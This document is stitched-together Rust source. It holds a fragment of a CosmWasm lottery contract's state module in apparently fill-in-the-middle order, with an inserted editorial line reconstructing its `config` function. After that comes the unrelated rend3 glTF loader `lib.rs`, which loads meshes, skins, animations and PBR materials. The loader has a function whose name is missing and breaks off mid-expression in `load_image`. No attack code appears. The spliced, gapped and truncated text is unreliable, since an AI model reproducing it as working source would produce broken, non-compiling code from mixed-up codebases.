use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use cosmwasm_std::{CanonicalAddr, Storage, Uint128}; use cosmwasm_storage::{singleton, singleton_read, ReadonlySingleton, Singleton, bucket, bucket_read, Bucket, ReadonlyBucket}; pub static CONFIG_KEY: &[u8] = b"config"; static BALANCE_KEY: &[u8] = b"balance"; #[derive(Serialize, Deserialize, Clone, Debug, PartialEq, JsonSchema)] pub struct Entry { pub weight: Uint128, } #[derive(Serialize, Deserialize, Clone, Debug, PartialEq, JsonSchema)] pub struct State { pub entries: Vec<(CanonicalAddr, Uint128)>, // maps address to weight pub contract_owner: CanonicalAddr, pub seed: Vec<u8>, pub entropy: Vec<u8>, pub start_time: u64, pub winner1: CanonicalAddr, pub winner2: CanonicalAddr, pub winner3: CanonicalAddr, pub staked_tokens: Uint128, } pub fn config<S: Storage>(storage: &mut S) -> Singleton<S, State>
pub fn config_read<S: Storage>(storage: &S) -> ReadonlySingleton<S, State> { singleton_read(storage, CONFIG_KEY) } pub fn balance<S: Storage>(storage: &mut S) -> Bucket<S, Uint128> { bucket(BALANCE_KEY, storage) } pub fn balance_read<S: Storage>(storage: &S) -> ReadonlyBucket<S, Uint128> { bucket_read(BALANCE_KEY, storage) }
{ singleton(storage, CONFIG_KEY) }
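This completion appears to be the body of `config`, mirroring `config_read` below it. Rejoined (formatting reconstructed, content unchanged):

pub fn config<S: Storage>(storage: &mut S) -> Singleton<S, State> {
    singleton(storage, CONFIG_KEY)
}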
lib.rs
//! gltf scene and model loader for rend3. //! //! This crate attempts to map the concepts into gltf as best it can into rend3, //! but there is quite a variety of things that would be insane to properly //! represent. //! //! To "just load a gltf/glb", look at the documentation for [`load_gltf`] and //! use the default [`filesystem_io_func`]. //! //! Individual components of a gltf can be loaded with the other functions in //! this crate. //! //! # Supported Extensions //! - `KHR_punctual_lights` //! - `KHR_texture_transform` //! - `KHR_material_unlit` //! //! # Known Limitations //! - Only the albedo texture's transform from `KHR_texture_transform` will be //! used. //! - Double sided materials are currently unsupported. use glam::{Mat3, Mat4, Quat, UVec2, Vec2, Vec3, Vec4}; use gltf::buffer::Source; use image::GenericImageView; use rend3::{ types::{self, Handedness, MeshValidationError, ObjectHandle, ObjectMeshKind, Skeleton, SkeletonHandle}, util::typedefs::{FastHashMap, SsoString}, Renderer, }; use rend3_routine::pbr; use std::{ borrow::Cow, collections::{hash_map::Entry, BTreeMap, HashMap, VecDeque}, future::Future, path::Path, }; use thiserror::Error; /// Wrapper around a T that stores an optional label. #[derive(Debug, Clone)] pub struct Labeled<T> { /// Inner value pub inner: T, /// Label associated with the T pub label: Option<SsoString>, } impl<T> Labeled<T> { /// Create a new pub fn new(inner: T, label: Option<&str>) -> Self { Self { inner, label: label.map(SsoString::from), } } } /// A single sub-mesh of a gltf. #[derive(Debug)] pub struct MeshPrimitive { pub handle: types::MeshHandle, /// Index into the material vector given by [`load_materials_and_textures`] /// or [`LoadedGltfScene::materials`]. pub material: Option<usize>, } /// Set of [`MeshPrimitive`]s that make up a logical mesh. #[derive(Debug)] pub struct Mesh { pub primitives: Vec<MeshPrimitive>, } /// A set of [`SkeletonHandle`]s, one per mesh in the wrapping object, plus the /// index of the skin data in the `skins` array of [`LoadedGltfScene`]. /// /// All the skeletons are guaranteed to have the same number of joints and /// structure, but deform different meshes of the object. #[derive(Debug, Clone)] pub struct Armature { /// The list of skeletons that are deforming this node's mesh primitives. pub skeletons: Vec<SkeletonHandle>, /// Index to the skin that contains the inverse bind matrices for the /// skeletons in this armature. pub skin_index: usize, } /// Set of [`ObjectHandle`]s that correspond to a logical object in the node /// tree. When the node corresponds to an animated mesh, the `armature` will /// contain the necessary data to deform the primitives. /// /// This is to a [`ObjectHandle`], as a [`Mesh`] is to a [`MeshPrimitive`]. #[derive(Debug, Clone)] pub struct Object { pub primitives: Vec<ObjectHandle>, pub armature: Option<Armature>, } /// Node in the gltf scene tree #[derive(Debug, Default, Clone)] pub struct Node { /// The index of the parent node in the nodes array, if any. pub parent: Option<usize>, /// The index of the children nodes in the nodes array pub children: Vec<usize>, /// Transform of this node relative to its parents. pub local_transform: Mat4, /// Object for this node. pub object: Option<Labeled<Object>>, /// Directional light for this node. pub directional_light: Option<types::DirectionalLightHandle>, } /// Hashmap key for caching images. #[derive(Debug, Copy, Clone, PartialEq, Eq, Hash)] pub struct ImageKey { /// Index into the image array. 
pub index: usize, /// If the image should be viewed as srgb or not. pub srgb: bool, } /// A uploaded texture and its format. #[derive(Debug, Clone, PartialEq, Eq)] pub struct Texture { pub handle: types::TextureHandle, pub format: types::TextureFormat, } #[derive(Debug)] pub struct Joint { pub node_idx: usize, } #[derive(Debug)] pub struct Skin { pub inverse_bind_matrices: Vec<Mat4>, pub joints: Vec<Labeled<Joint>>, } #[derive(Debug)] pub struct AnimationChannel<T> { pub values: Vec<T>, pub times: Vec<f32>, } /// Animation data for a single joint, with translation, rotation and scale /// channels. #[derive(Debug)] pub struct PosRotScale { pub node_idx: u32, pub translation: Option<AnimationChannel<Vec3>>, pub rotation: Option<AnimationChannel<Quat>>, pub scale: Option<AnimationChannel<Vec3>>, } impl PosRotScale { pub fn new(node_idx: u32) -> Self { Self { node_idx, translation: None, rotation: None, scale: None, } } } #[derive(Debug)] pub struct Animation { /// Maps the node index of a joint to its animation keyframe data. pub channels: HashMap<usize, PosRotScale>, /// The total duration of the animation. Computed as the maximum time of any /// keyframe on any channel. pub duration: f32, } /// Hashmap which stores a mapping from [`ImageKey`] to a labeled handle. pub type ImageMap = FastHashMap<ImageKey, Labeled<Texture>>; /// Loaded data on a gltf scene that can be reused across multiple instances of /// the same set of objects. #[derive(Debug)] pub struct LoadedGltfScene { pub meshes: Vec<Labeled<Mesh>>, pub materials: Vec<Labeled<types::MaterialHandle>>, pub default_material: types::MaterialHandle, pub images: ImageMap, pub skins: Vec<Labeled<Skin>>, pub animations: Vec<Labeled<Animation>>, } /// Data specific to each instance of a gltf scene. pub struct GltfSceneInstance { /// The flat list of nodes in the scene. Each node points to a list of /// children and optionally a parent using indices. pub nodes: Vec<Labeled<Node>>, /// Iterating the `nodes` following the order in this list guarantees that /// parents will always be visited before children. This allows avoiding /// recursion in several algorithms. pub topological_order: Vec<usize>, } /// Describes how loading gltf failed. 
#[derive(Debug, Error)] pub enum GltfLoadError<E: std::error::Error + 'static> { #[error("Gltf parsing or validation error")] Gltf(#[from] gltf::Error), #[error("Buffer {0} failed to be loaded from the fs")] BufferIo(SsoString, #[source] E), #[error("Texture {0} failed to be loaded from the fs")] TextureIo(SsoString, #[source] E), #[error("Texture {0} failed to be loaded as an image")] TextureDecode(SsoString, #[source] image::ImageError), #[cfg(feature = "ddsfile")] #[error("Texture {0} failed to be loaded as a ddsfile due to incompatible dxgi format {1:?}")] TextureBadDxgiFormat(SsoString, ddsfile::DxgiFormat), #[cfg(feature = "ddsfile")] #[error("Texture {0} failed to be loaded as a ddsfile due to incompatible d3d format {1:?}")] TextureBadD3DFormat(SsoString, ddsfile::D3DFormat), #[cfg(feature = "ktx2")] #[error("Texture {0} failed to be loaded as a ktx2 file due to incompatible format {1:?}")] TextureBadKxt2Format(SsoString, ktx2::Format), #[error("Texture {0} failed to be loaded as it has 0 levels")] TextureZeroLevels(SsoString), #[error("Texture {0} failed to be loaded as it has 0 layers")] TextureTooManyLayers(SsoString), #[error("Rend3-gltf expects gltf files to have a single scene.")] GltfSingleSceneOnly, #[error("Mesh {0} does not have positions")] MissingPositions(usize), #[error("Gltf file references mesh {0} but mesh does not exist")] MissingMesh(usize), #[error("Gltf file references skin {0} but skin does not exist")] MissingSkin(usize), #[error("Gltf file references material {0} but material does not exist")] MissingMaterial(usize), #[error("Mesh {0} primitive {1} uses unsupported mode {2:?}. Only triangles are supported")] UnsupportedPrimitiveMode(usize, usize, gltf::mesh::Mode), #[error("Mesh {0} failed validation")] MeshValidationError(usize, #[source] MeshValidationError), #[error("Animation {0} channel {1} does not have keyframe times.")] MissingKeyframeTimes(usize, usize), #[error("Animation {0} channel {1} does not have keyframe values.")] MissingKeyframeValues(usize, usize), } /// Default implementation of [`load_gltf`]'s `io_func` that loads from the /// filesystem relative to the gltf. /// /// The first argumnet is the directory all relative paths should be considered /// against. This is more than likely the directory the gltf/glb is in. pub async fn filesystem_io_func(parent_directory: impl AsRef<Path>, uri: SsoString) -> Result<Vec<u8>, std::io::Error> { let octet_stream_header = "data:"; if let Some(base64_data) = uri.strip_prefix(octet_stream_header) { let (_mime, rest) = base64_data.split_once(';').unwrap(); let (encoding, data) = rest.split_once(',').unwrap(); assert_eq!(encoding, "base64"); // profiling::scope!("decoding base64 uri"); log::info!("loading {} bytes of base64 data", data.len()); // TODO: errors Ok(base64::decode(data).unwrap()) } else { let path_resolved = parent_directory.as_ref().join(&*uri); let display = path_resolved.as_os_str().to_string_lossy(); // profiling::scope!("loading file", &display); log::info!("loading file '{}' from disk", &display); std::fs::read(path_resolved) } } /// Determines parameters that are given to various parts of the gltf world that /// cannot be specified by gltf alone. 
#[derive(Copy, Clone)] pub struct GltfLoadSettings { /// Global scale applied to all objects (default: 1) pub scale: f32, /// Size of the shadow map in world space (default: 100) pub directional_light_shadow_distance: f32, /// Coordinate space normal maps should use (default Up) pub normal_direction: pbr::NormalTextureYDirection, /// Enable built-in directional lights (default true) pub enable_directional: bool, } impl Default for GltfLoadSettings { fn default() -> Self { Self { scale: 1.0, directional_light_shadow_distance: 100.0, normal_direction: pbr::NormalTextureYDirection::Up, enable_directional: true, } } } /// Load a given gltf into the renderer's world. /// /// Allows the user to specify how URIs are resolved into their underlying data. /// Supports most gltfs and glbs. /// /// **Must** keep the [`LoadedGltfScene`] alive for the scene to remain. /// /// See [`load_gltf_data`] and [`instance_loaded_scene`] if you need more /// fine-grained control about how and when the scene data is instanced. /// /// ```no_run /// # use std::path::Path; /// # let renderer = unimplemented!(); /// let path = Path::new("some/path/scene.gltf"); // or glb /// let gltf_data = std::fs::read(&path).unwrap(); /// let parent_directory = path.parent().unwrap(); /// let _loaded = pollster::block_on(rend3_gltf::load_gltf( /// &renderer, /// &gltf_data, /// &rend3_gltf::GltfLoadSettings::default(), /// |p| rend3_gltf::filesystem_io_func(&parent_directory, p) /// )); /// ``` pub async fn load_gltf<F, Fut, E>( renderer: &Renderer, data: &[u8], settings: &GltfLoadSettings, io_func: F, ) -> Result<(LoadedGltfScene, GltfSceneInstance), GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { // profiling::scope!("loading gltf"); let mut file = { // profiling::scope!("parsing gltf"); gltf::Gltf::from_slice_without_validation(data)? }; let loaded = load_gltf_data(renderer, &mut file, settings, io_func).await?; if file.scenes().len() != 1 { return Err(GltfLoadError::GltfSingleSceneOnly); } let instance = instance_loaded_scene( renderer, &loaded, file.nodes().collect(), settings, Mat4::from_scale(Vec3::new( settings.scale, settings.scale, if renderer.handedness == Handedness::Left { -settings.scale } else { settings.scale }, )), )?; Ok((loaded, instance)) } /// Load a given gltf's data, like meshes and materials, without yet adding /// any of the nodes to the scene. /// /// Allows the user to specify how URIs are resolved into their underlying data. /// Supports most gltfs and glbs. 
/// /// **Must** keep the [`LoadedGltfScene`] alive for the meshes and materials pub async fn load_gltf_data<F, Fut, E>( renderer: &Renderer, file: &mut gltf::Gltf, settings: &GltfLoadSettings, mut io_func: F, ) -> Result<LoadedGltfScene, GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { // profiling::scope!("loading gltf data"); let blob = file.blob.take(); let buffers = load_buffers(file.buffers(), blob, &mut io_func).await?; let default_material = load_default_material(renderer); let meshes = load_meshes(renderer, file.meshes(), &buffers)?; let (materials, images) = load_materials_and_textures(renderer, file.materials(), &buffers, settings, &mut io_func).await?; let skins = load_skins(file.skins(), &buffers)?; let animations = load_animations(file.animations(), &buffers)?; let loaded = LoadedGltfScene { meshes, materials, default_material, images, skins, animations, }; Ok(loaded) } /// Adds a single mesh from the [`LoadedGltfScene`] found by its index, /// as an object to the scene. pub fn add_mesh_by_index<E: std::error::Error + 'static>( renderer: &Renderer, loaded: &LoadedGltfScene, mesh_index: usize, name: Option<&str>, skin_index: Option<usize>, transform: Mat4, ) -> Result<Labeled<Object>, GltfLoadError<E>> { let mesh_handle = loaded .meshes .get(mesh_index) .ok_or(GltfLoadError::MissingMesh(mesh_index))?; let mut primitives = Vec::new(); let mut skeletons = Vec::new(); let skin = if let Some(skin_index) = skin_index { let skin = loaded .skins .get(skin_index) .ok_or(GltfLoadError::MissingSkin(skin_index))?; Some(skin) } else { None }; for prim in &mesh_handle.inner.primitives { let mat_idx = prim.material; let mat = mat_idx .map_or_else( || Some(&loaded.default_material), |mat_idx| loaded.materials.get(mat_idx).map(|m| &m.inner), ) .ok_or_else(|| GltfLoadError::MissingMaterial(mat_idx.expect("Could not find default material")))?; let mesh_kind = if let Some(skin) = skin { let skeleton = renderer.add_skeleton(Skeleton { // We don't need to use the inverse bind matrices. At rest pose, every // joint matrix is inv_bind_pose * bind_pose, thus the identity matrix. joint_matrices: vec![Mat4::IDENTITY; skin.inner.inverse_bind_matrices.len()], mesh: prim.handle.clone(), }); skeletons.push(skeleton.clone()); ObjectMeshKind::Animated(skeleton) } else { ObjectMeshKind::Static(prim.handle.clone()) }; primitives.push(renderer.add_object(types::Object { mesh_kind, material: mat.clone(), transform, })); } Ok(Labeled::new( Object { primitives, armature: skin_index.map(|skin_index| Armature { skeletons, skin_index }), }, name, )) } /// Computes topological ordering and children->parent map. fn node_indices_topological_sort(nodes: &[gltf::Node]) -> (Vec<usize>, BTreeMap<usize, usize>) { // NOTE: The algorithm uses BTreeMaps to guarantee consistent ordering. // Maps parent to list of children let mut children = BTreeMap::<usize, Vec<usize>>::new(); for node in nodes { children.insert(node.index(), node.children().map(|n| n.index()).collect()); } // Maps child to parent let parents: BTreeMap<usize, usize> = children .iter() .flat_map(|(parent, children)| children.iter().map(|ch| (*ch, *parent))) .collect(); // Initialize the BFS queue with nodes that don't have any parent (i.e. 
roots) let mut queue: VecDeque<usize> = children.keys().filter(|n| parents.get(n).is_none()).cloned().collect(); let mut topological_sort = Vec::<usize>::new(); while let Some(n) = queue.pop_front() { topological_sort.push(n); for ch in &children[&n] { queue.push_back(*ch); } } (topological_sort, parents) } /// Instances a Gltf scene that has been loaded using [`load_gltf_data`]. Will /// create as many [`Object`]s as required. /// /// You need to hold onto the returned value from this function to make sure the /// objects don't get deleted. pub fn instance_loaded_scene<'a, E: std::error::Error + 'static>( renderer: &Renderer, loaded: &LoadedGltfScene, nodes: Vec<gltf::Node<'a>>, settings: &GltfLoadSettings, parent_transform: Mat4, ) -> Result<GltfSceneInstance, GltfLoadError<E>> { let (topological_order, parents) = node_indices_topological_sort(&nodes); let num_nodes = nodes.len(); debug_assert_eq!(topological_order.len(), num_nodes); let mut node_transforms = vec![Mat4::IDENTITY; num_nodes]; let mut final_nodes = vec![Labeled::new(Node::default(), None); nodes.len()]; for node_idx in topological_order.iter() { let node = &nodes[*node_idx]; let local_transform = Mat4::from_cols_array_2d(&node.transform().matrix()); let parent_transform = parents .get(&node.index()) .map(|p| node_transforms[*p]) .unwrap_or(parent_transform); let transform = parent_transform * local_transform; node_transforms[*node_idx] = transform; let object = if let Some(mesh) = node.mesh() { Some(add_mesh_by_index( renderer, loaded, mesh.index(), mesh.name(), node.skin().map(|s| s.index()), transform, )?) } else { None }; let light = if let Some(light) = node.light() { match light.kind() { gltf::khr_lights_punctual::Kind::Directional if settings.enable_directional => { let direction = transform.transform_vector3(-Vec3::Z); Some(renderer.add_directional_light(types::DirectionalLight { color: Vec3::from(light.color()), intensity: light.intensity(), direction, distance: settings.directional_light_shadow_distance, })) } _ => None, } } else { None }; let children = node.children().map(|node| node.index()).collect(); final_nodes[*node_idx] = Labeled::new( Node { parent: parents.get(&node.index()).cloned(), children, local_transform, object, directional_light: light, }, node.name(), ) } Ok(GltfSceneInstance { nodes: final_nodes, topological_order, }) } /// Loads buffers from a [`gltf::Buffer`] iterator, calling io_func to resolve /// them from URI. /// /// If the gltf came from a .glb, the glb's blob should be provided. /// /// # Panics /// /// Panics if buffers requires a blob but no blob was given. pub async fn load_buffers<F, Fut, E>( file: impl ExactSizeIterator<Item = gltf::Buffer<'_>>, blob: Option<Vec<u8>>, mut io_func: F, ) -> Result<Vec<Vec<u8>>, GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { // profiling::scope!("loading buffers"); let mut buffers = Vec::with_capacity(file.len()); let mut blob_index = None; for b in file { let data = match b.source() { Source::Bin => { blob_index = Some(b.index()); Vec::new() } Source::Uri(uri) => io_func(SsoString::from(uri)) .await .map_err(|e| GltfLoadError::BufferIo(SsoString::from(uri), e))?, }; buffers.push(data); } if let Some(blob_index) = blob_index { buffers[blob_index] = blob.expect("glb blob not found, but gltf expected it"); } Ok(buffers) } /// Loads meshes from a [`gltf::Mesh`] iterator. /// /// All binary data buffers must be provided. 
Call this with /// [`gltf::Document::meshes`] as the mesh argument. pub fn load_meshes<'a, E: std::error::Error + 'static>( renderer: &Renderer, meshes: impl Iterator<Item = gltf::Mesh<'a>>, buffers: &[Vec<u8>], ) -> Result<Vec<Labeled<Mesh>>, GltfLoadError<E>> { profiling::scope!("loading meshes"); meshes .into_iter() .map(|mesh| { let mut res_prims = Vec::new(); for prim in mesh.primitives() { if prim.mode() != gltf::mesh::Mode::Triangles { return Err(GltfLoadError::UnsupportedPrimitiveMode( mesh.index(), prim.index(), prim.mode(), )); } let reader = prim.reader(|b| Some(&buffers[b.index()][..b.length()])); let vertex_positions: Vec<_> = reader .read_positions() .ok_or_else(|| GltfLoadError::MissingPositions(mesh.index()))? .map(Vec3::from) .collect(); // glTF models are right handed, so we must flip their winding order let mut builder = types::MeshBuilder::new(vertex_positions, renderer.handedness); if renderer.handedness == Handedness::Left { builder = builder.with_flip_winding_order(); } if let Some(normals) = reader.read_normals() { builder = builder.with_vertex_normals(normals.map(Vec3::from).collect()) } if let Some(tangents) = reader.read_tangents() { // todo: handedness builder = builder.with_vertex_tangents(tangents.map(|[x, y, z, _]| Vec3::new(x, y, z)).collect()) } if let Some(uvs) = reader.read_tex_coords(0) { builder = builder.with_vertex_uv0(uvs.into_f32().map(Vec2::from).collect()) } if let Some(uvs) = reader.read_tex_coords(1) { builder = builder.with_vertex_uv1(uvs.into_f32().map(Vec2::from).collect()) } if let Some(colors) = reader.read_colors(0) { builder = builder.with_vertex_colors(colors.into_rgba_u8().collect()) } if let Some(indices) = reader.read_indices() { builder = builder.with_indices(indices.into_u32().collect()) } if let Some(joint_indices) = reader.read_joints(0) { builder = builder.with_vertex_joint_indices(joint_indices.into_u16().collect()) } if let Some(joint_weights) = reader.read_weights(0) { builder = builder.with_vertex_joint_weights(joint_weights.into_f32().map(Vec4::from).collect()) } let mesh = builder .build() .map_err(|valid| GltfLoadError::MeshValidationError(mesh.index(), valid))?; let handle = renderer.add_mesh(mesh); res_prims.push(MeshPrimitive { handle, material: prim.material().index(), }) } Ok(Labeled::new(Mesh { primitives: res_prims }, mesh.name())) }) .collect() } fn load_skins<E: std::error::Error + 'static>( skins: gltf::iter::Skins, buffers: &[Vec<u8>], ) -> Result<Vec<Labeled<Skin>>, GltfLoadError<E>> { let mut res_skins = vec![]; for skin in skins { let num_joints = skin.joints().count(); let reader = skin.reader(|b| Some(&buffers[b.index()][..b.length()])); let inv_b_mats = if let Some(inv_b_mats) = reader.read_inverse_bind_matrices() { inv_b_mats.map(|mat| Mat4::from_cols_array_2d(&mat)).collect() } else { // The inverse bind matrices are sometimes not provided. This has to // be interpreted as all of them being the identity transform. vec![Mat4::IDENTITY; num_joints] }; let joints = skin .joints() .map(|node| Labeled::new(Joint { node_idx: node.index() }, node.name())) .collect(); res_skins.push(Labeled::new( Skin { inverse_bind_matrices: inv_b_mats, joints, }, skin.name(), )) } Ok(res_skins) } fn
(channels: &HashMap<usize, PosRotScale>) -> f32 { fn channel_duration<T>(channel: &AnimationChannel<T>) -> f32 { channel .times .iter() .copied() .map(float_ord::FloatOrd) .max() .map(|f_ord| f_ord.0) .unwrap_or(0.0) } channels .values() .map(|ch| { let m1 = ch.translation.as_ref().map(channel_duration).unwrap_or(0.0); let m2 = ch.rotation.as_ref().map(channel_duration).unwrap_or(0.0); let m3 = ch.scale.as_ref().map(channel_duration).unwrap_or(0.0); m1.max(m2).max(m3) }) .map(float_ord::FloatOrd) .max() .map(|x| x.0) .unwrap_or(0.0) } fn load_animations<E: std::error::Error + 'static>( animations: gltf::iter::Animations, buffers: &[Vec<u8>], ) -> Result<Vec<Labeled<Animation>>, GltfLoadError<E>> { let mut result = Vec::new(); for anim in animations { let mut result_channels = HashMap::<usize, PosRotScale>::new(); for (ch_idx, ch) in anim.channels().enumerate() { let target = ch.target(); let node_idx = target.node().index(); // Get the PosRotScale for the current target node or create a new // one if it doesn't exist. let chs = result_channels .entry(node_idx) .or_insert_with(|| PosRotScale::new(node_idx as u32)); let reader = ch.reader(|b| Some(&buffers[b.index()][..b.length()])); // In gltf, 'inputs' refers to the keyframe times let times = reader .read_inputs() .ok_or_else(|| GltfLoadError::MissingKeyframeTimes(anim.index(), ch_idx))? .collect(); // And 'outputs' means the keyframe values, which varies depending on the type // of keyframe match reader .read_outputs() .ok_or_else(|| GltfLoadError::MissingKeyframeValues(anim.index(), ch_idx))? { gltf::animation::util::ReadOutputs::Translations(trs) => { chs.translation = Some(AnimationChannel { values: trs.map(Vec3::from).collect(), times, }) } gltf::animation::util::ReadOutputs::Rotations(rots) => { chs.rotation = Some(AnimationChannel { values: rots.into_f32().map(Quat::from_array).collect(), times, }); } gltf::animation::util::ReadOutputs::Scales(scls) => { chs.scale = Some(AnimationChannel { values: scls.map(Vec3::from).collect(), times, }); } gltf::animation::util::ReadOutputs::MorphTargetWeights(_) => { // TODO } } } result.push(Labeled::new( Animation { duration: compute_animation_duration(&result_channels), channels: result_channels, }, anim.name(), )) } Ok(result) } /// Creates a gltf default material. pub fn load_default_material(renderer: &Renderer) -> types::MaterialHandle { profiling::scope!("creating default material"); renderer.add_material(pbr::PbrMaterial { albedo: pbr::AlbedoComponent::Value(Vec4::splat(1.0)), transparency: pbr::Transparency::Opaque, normal: pbr::NormalTexture::None, aomr_textures: pbr::AoMRTextures::None, ao_factor: Some(1.0), metallic_factor: Some(1.0), roughness_factor: Some(1.0), clearcoat_textures: pbr::ClearcoatTextures::None, clearcoat_factor: Some(1.0), clearcoat_roughness_factor: Some(1.0), emissive: pbr::MaterialComponent::None, reflectance: pbr::MaterialComponent::None, anisotropy: pbr::MaterialComponent::None, uv_transform0: Mat3::IDENTITY, uv_transform1: Mat3::IDENTITY, unlit: false, sample_type: pbr::SampleType::Linear, }) } /// Loads materials and textures from a [`gltf::Material`] iterator. /// /// All binary data buffers must be provided. Call this with /// [`gltf::Document::materials`] as the materials argument. /// /// io_func determines how URIs are resolved into their underlying data. 
pub async fn load_materials_and_textures<F, Fut, E>( renderer: &Renderer, materials: impl ExactSizeIterator<Item = gltf::Material<'_>>, buffers: &[Vec<u8>], settings: &GltfLoadSettings, io_func: &mut F, ) -> Result<(Vec<Labeled<types::MaterialHandle>>, ImageMap), GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { // profiling::scope!("loading materials and textures"); let mut images = ImageMap::default(); let mut result = Vec::with_capacity(materials.len()); for material in materials { // profiling::scope!("load material", material.name().unwrap_or_default()); let pbr = material.pbr_metallic_roughness(); let albedo = pbr.base_color_texture(); let albedo_factor = pbr.base_color_factor(); let occlusion = material.occlusion_texture(); let emissive = material.emissive_texture(); let emissive_factor = material.emissive_factor(); let normals = material.normal_texture(); let roughness_factor = pbr.roughness_factor(); let metallic_factor = pbr.metallic_factor(); let metallic_roughness = pbr.metallic_roughness_texture(); let nearest = albedo .as_ref() .map(|i| match i.texture().sampler().mag_filter() { Some(gltf::texture::MagFilter::Nearest) => pbr::SampleType::Nearest, Some(gltf::texture::MagFilter::Linear) => pbr::SampleType::Linear, None => pbr::SampleType::Linear, }) .unwrap_or_default(); let uv_transform = albedo .as_ref() .and_then(|i| { let transform = i.texture_transform()?; Some(Mat3::from_scale_angle_translation( transform.scale().into(), transform.rotation(), transform.offset().into(), )) }) .unwrap_or(Mat3::IDENTITY); let albedo_tex = util::texture_option_resolve( albedo.map(|i| load_image_cached(renderer, &mut images, i.texture().source(), true, buffers, io_func)), ) .await?; let occlusion_tex = util::texture_option_resolve( occlusion.map(|i| load_image_cached(renderer, &mut images, i.texture().source(), false, buffers, io_func)), ) .await?; let emissive_tex = util::texture_option_resolve( emissive.map(|i| load_image_cached(renderer, &mut images, i.texture().source(), true, buffers, io_func)), ) .await?; let normals_tex = util::texture_option_resolve( normals.map(|i| load_image_cached(renderer, &mut images, i.texture().source(), false, buffers, io_func)), ) .await?; let metallic_roughness_tex = util::texture_option_resolve( metallic_roughness .map(|i| load_image_cached(renderer, &mut images, i.texture().source(), false, buffers, io_func)), ) .await?; let handle = renderer.add_material(pbr::PbrMaterial { albedo: match albedo_tex { Some(tex) => pbr::AlbedoComponent::TextureVertexValue { texture: tex.handle, value: Vec4::from(albedo_factor), srgb: false, }, None => pbr::AlbedoComponent::ValueVertex { value: Vec4::from(albedo_factor), srgb: false, }, }, transparency: match material.alpha_mode() { gltf::material::AlphaMode::Opaque => pbr::Transparency::Opaque, gltf::material::AlphaMode::Mask => pbr::Transparency::Cutout { cutout: material.alpha_cutoff().unwrap_or(0.5), }, gltf::material::AlphaMode::Blend => pbr::Transparency::Blend, }, normal: match normals_tex { Some(tex) if tex.format.describe().components == 2 => { pbr::NormalTexture::Bicomponent(tex.handle, settings.normal_direction) } Some(tex) if tex.format.describe().components >= 3 => { pbr::NormalTexture::Tricomponent(tex.handle, settings.normal_direction) } _ => pbr::NormalTexture::None, }, aomr_textures: match (metallic_roughness_tex, occlusion_tex) { (Some(mr), Some(ao)) if mr == ao => pbr::AoMRTextures::Combined { texture: Some(mr.handle), }, (mr, ao) 
if ao .as_ref() .map(|ao| ao.format.describe().components < 3) .unwrap_or(false) => { pbr::AoMRTextures::Split { mr_texture: util::extract_handle(mr), ao_texture: util::extract_handle(ao), } } (mr, ao) => pbr::AoMRTextures::SwizzledSplit { mr_texture: util::extract_handle(mr), ao_texture: util::extract_handle(ao), }, }, metallic_factor: Some(metallic_factor), roughness_factor: Some(roughness_factor), emissive: match emissive_tex { Some(tex) => pbr::MaterialComponent::TextureValue { texture: tex.handle, value: Vec3::from(emissive_factor), }, None => pbr::MaterialComponent::Value(Vec3::from(emissive_factor)), }, uv_transform0: uv_transform, uv_transform1: uv_transform, unlit: material.unlit(), sample_type: nearest, ..pbr::PbrMaterial::default() }); result.push(Labeled::new(handle, material.name())); } Ok((result, images)) } /// Loads a single image from a [`gltf::Image`], with caching. /// /// Uses the given ImageMap as a cache. /// /// All binary data buffers must be provided. You can get the image from a /// texture by calling [`gltf::Texture::source`]. /// /// io_func determines how URIs are resolved into their underlying data. pub async fn load_image_cached<F, Fut, E>( renderer: &Renderer, images: &mut ImageMap, image: gltf::Image<'_>, srgb: bool, buffers: &[Vec<u8>], io_func: &mut F, ) -> Result<Labeled<Texture>, GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { let key = ImageKey { index: image.index(), srgb, }; let entry = match images.entry(key) { Entry::Occupied(handle) => return Ok(handle.get().clone()), Entry::Vacant(v) => v, }; let handle = load_image(renderer, image, srgb, buffers, io_func).await?; entry.insert(handle.clone()); Ok(handle) } /// Loads a single image from a [`gltf::Image`]. /// /// All binary data buffers must be provided. Call this with /// [`gltf::Document::materials`] as the materials argument. /// /// io_func determines how URIs are resolved into their underlying data. pub async fn load_image<F, Fut, E>( renderer: &Renderer, image: gltf::Image<'_>, srgb: bool, buffers: &[Vec<u8>], io_func: &mut F, ) -> Result<Labeled<Texture>, GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { // profiling::scope!("load image", image.name().unwrap_or_default()); let (data, uri) = match image.source() { gltf::image::Source::Uri { uri, .. } => { let data = io_func(SsoString::from(uri)) .await .map_err(|e| GltfLoadError::TextureIo(SsoString::from(uri), e))?; (Cow::Owned(data), SsoString::from(uri)) } gltf::image::Source::View { view, .. 
} => { let start = view.offset(); let end = start + view.length(); ( Cow::Borrowed(&buffers[view.buffer().index()][start..end]), SsoString::from("<embedded>"), ) } }; let mut uri = Some(uri); let mut texture = None; #[cfg(feature = "ktx2")] if let Ok(reader) = ktx2::Reader::new(&data) { profiling::scope!("parsing ktx2"); let header = reader.header(); let src_format = header.format.unwrap(); let format = util::map_ktx2_format(src_format, srgb) .ok_or_else(|| GltfLoadError::TextureBadKxt2Format(uri.take().unwrap(), src_format))?; if header.level_count == 0 { return Err(GltfLoadError::TextureZeroLevels(uri.take().unwrap())); } if header.layer_count >= 2 { return Err(GltfLoadError::TextureTooManyLayers(uri.take().unwrap())); } let describe = format.describe(); let guaranteed_format = describe.guaranteed_format_features; let generate = header.level_count == 1 && guaranteed_format.filterable && guaranteed_format.allowed_usages.contains( rend3::types::TextureUsages::TEXTURE_BINDING | rend3::types::TextureUsages::RENDER_ATTACHMENT, ); let size: usize = reader.levels().map(|s| s.len()).sum(); let mut data = Vec::with_capacity(size); for level in reader.levels() { data.extend_from_slice(level); } texture = Some(types::Texture { label: image.name().map(str::to_owned), format, size: UVec2::new(header.pixel_width, 